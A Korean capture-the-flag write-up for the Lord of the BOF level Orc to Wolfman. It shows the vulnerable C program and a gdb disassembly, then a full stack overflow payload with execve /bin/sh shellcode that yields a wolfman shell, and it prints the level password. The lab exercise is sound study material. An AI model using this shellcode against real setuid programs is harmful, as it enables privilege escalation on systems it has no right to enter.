[시스템해킹][LOB] Level5 : Orc -> Wolfman

우선 코드부터 살펴보자.

 

wolfman  wolfman.c [orc@localhost orc]$ cat wolfman.c /*         The Lord of the BOF : The Fellowship of the BOF         - wolfman         - egghunter + buffer hunter */ #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) {  char buffer[40];  int i;  if(argc < 2){   printf("argv error\n");   exit(0);  }  // egghunter  for(i=0; environ[i]; i++)   memset(environ[i], 0, strlen(environ[i]));  if(argv[1][47] != '\xbf')  {   printf("stack is still your friend.\n");   exit(0);  }  strcpy(buffer, argv[1]);  printf("%s\n", buffer);         // buffer hunter         memset(buffer, 0, 40); }

 

이번 문제는 Level4의 문제와 다를게 없다는 것을 확인할 수 있다. 다만 뒤에서 memset을 해주지만 Level4에서 사용한 방법에서는 저 부분이 영향을 미치지 않기 때문에, Payload 또한 그대로 사용해도 된다. 다만, Ret 부분만 약간 변경해주면 된다. 우선 어셈블 코드와 기타 메모리를 확인해보자.

 

[orc@localhost orc]$ gdb -q w (gdb) set disassembly-flavor intel (gdb) disass main Dump of assembler code for function main: 0x8048500 <main>: push   %ebp 0x8048501 <main+1>: mov    %ebp,%esp 0x8048503 <main+3>: sub    %esp,44 0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1 0x804850a <main+10>: jg     0x8048523 <main+35> 0x804850c <main+12>: push   0x8048640 0x8048511 <main+17>: call   0x8048410 <printf> 0x8048516 <main+22>: add    %esp,4 0x8048519 <main+25>: push   0 0x804851b <main+27>: call   0x8048420 <exit> 0x8048520 <main+32>: add    %esp,4 0x8048523 <main+35>: nop    0x8048524 <main+36>: mov    DWORD PTR [%ebp-44],0x0 0x804852b <main+43>: nop    0x804852c <main+44>: lea    %esi,[%esi*1] 0x8048530 <main+48>: mov    %eax,DWORD PTR [%ebp-44] 0x8048533 <main+51>: lea    %edx,[%eax*4] 0x804853a <main+58>: mov    %eax,%ds:0x8049760 0x804853f <main+63>: cmp    DWORD PTR [%eax+%edx],0 0x8048543 <main+67>: jne    0x8048547 <main+71> 0x8048545 <main+69>: jmp    0x8048587 <main+135> 0x8048547 <main+71>: mov    %eax,DWORD PTR [%ebp-44] 0x804854a <main+74>: lea    %edx,[%eax*4] 0x8048551 <main+81>: mov    %eax,%ds:0x8049760 0x8048556 <main+86>: mov    %edx,DWORD PTR [%eax+%edx] 0x8048559 <main+89>: push   %edx 0x804855a <main+90>: call   0x80483f0 <strlen> 0x804855f <main+95>: add    %esp,4 0x8048562 <main+98>: mov    %eax,%eax 0x8048564 <main+100>: push   %eax 0x8048565 <main+101>: push   0 0x8048567 <main+103>: mov    %eax,DWORD PTR [%ebp-44] 0x804856a <main+106>: lea    %edx,[%eax*4] 0x8048571 <main+113>: mov    %eax,%ds:0x8049760 0x8048576 <main+118>: mov    %edx,DWORD PTR [%eax+%edx] 0x8048579 <main+121>: push   %edx 0x804857a <main+122>: call   0x8048430 <memset> 0x804857f <main+127>: add    %esp,12 0x8048582 <main+130>: inc    DWORD PTR [%ebp-44] 0x8048585 <main+133>: jmp    0x8048530 <main+48> 0x8048587 <main+135>: mov    %eax,DWORD PTR [%ebp+12] 0x804858a <main+138>: add    %eax,4 0x804858d <main+141>: mov    %edx,DWORD PTR [%eax] 0x804858f <main+143>: add    %edx,47 0x8048592 <main+146>: cmp    BYTE PTR [%edx],0xbf 0x8048595 <main+149>: je     0x80485b0 <main+176> 0x8048597 <main+151>: push   0x804864c 0x804859c <main+156>: call   0x8048410 <printf> 0x80485a1 <main+161>: add    %esp,4 0x80485a4 <main+164>: push   0 0x80485a6 <main+166>: call   0x8048420 <exit> 0x80485ab <main+171>: add    %esp,4 0x80485ae <main+174>: mov    %esi,%esi 0x80485b0 <main+176>: mov    %eax,DWORD PTR [%ebp+12] 0x80485b3 <main+179>: add    %eax,4 0x80485b6 <main+182>: mov    %edx,DWORD PTR [%eax] 0x80485b8 <main+184>: push   %edx 0x80485b9 <main+185>: lea    %eax,[%ebp-40] 0x80485bc <main+188>: push   %eax 0x80485bd <main+189>: call   0x8048440 <strcpy> 0x80485c2 <main+194>: add    %esp,8 0x80485c5 <main+197>: lea    %eax,[%ebp-40] 0x80485c8 <main+200>: push   %eax 0x80485c9 <main+201>: push   0x8048669 0x80485ce <main+206>: call   0x8048410 <printf> 0x80485d3 <main+211>: add    %esp,8 0x80485d6 <main+214>: push   40 0x80485d8 <main+216>: push   0 0x80485da <main+218>: lea    %eax,[%ebp-40] 0x80485dd <main+221>: push   %eax 0x80485de <main+222>: call   0x8048430 <memset> 0x80485e3 <main+227>: add    %esp,12 0x80485e6 <main+230>: leave  0x80485e7 <main+231>: ret    0x80485e8 <main+232>: nop    0x80485e9 <main+233>: nop    0x80485ea <main+234>: nop    0x80485eb <main+235>: nop    0x80485ec <main+236>: nop    0x80485ed <main+237>: nop    0x80485ee <main+238>: nop    0x80485ef <main+239>: nop    End of assembler dump. (gdb) b *main+146 Breakpoint 1 at 0x8048592 <3\x89\xe1\x99\xb0\x0b\xcd\x80"+"\xe7\xfd\xff\xbf"')                         Starting program: /home/orc/w $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\xe7\xfd\xff\xbf"') Breakpoint 1, 0x8048592 in main () (gdb) x/40x $edx 0xbffffe2d: 0x000000bf 0x00000000 0x00000000 0x00000000 0xbffffe3d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe4d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe5d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe6d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe7d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe8d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe9d: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffead: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffebd: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) x/40x $edx-47 0xbffffdfe: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffe0e: 0x90909090 0x6850c031 0x68732f2f 0x69622f68 0xbffffe1e: 0x50e3896e 0x99e18953 0x80cd0bb0 0xbffffde7 0xbffffe2e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe3e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe4e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe5e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe6e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe7e: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe8e: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) q

 

별다른 것은 없다는 것을 다시한번 더 확인할 수 있다. 그럼 Payload를 작성해보자.

 

$(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x08\xfe\xff\xbf"')

 

그럼 작성한 Payload를 가지고 공격해보자.

 

<\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x08\xfe\xff\xbf"')  ��������������������1�Ph//shh/bin��PS�ᙰ                                       ��� bash$ bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ /bin/my-pass euid = 505 love eyuna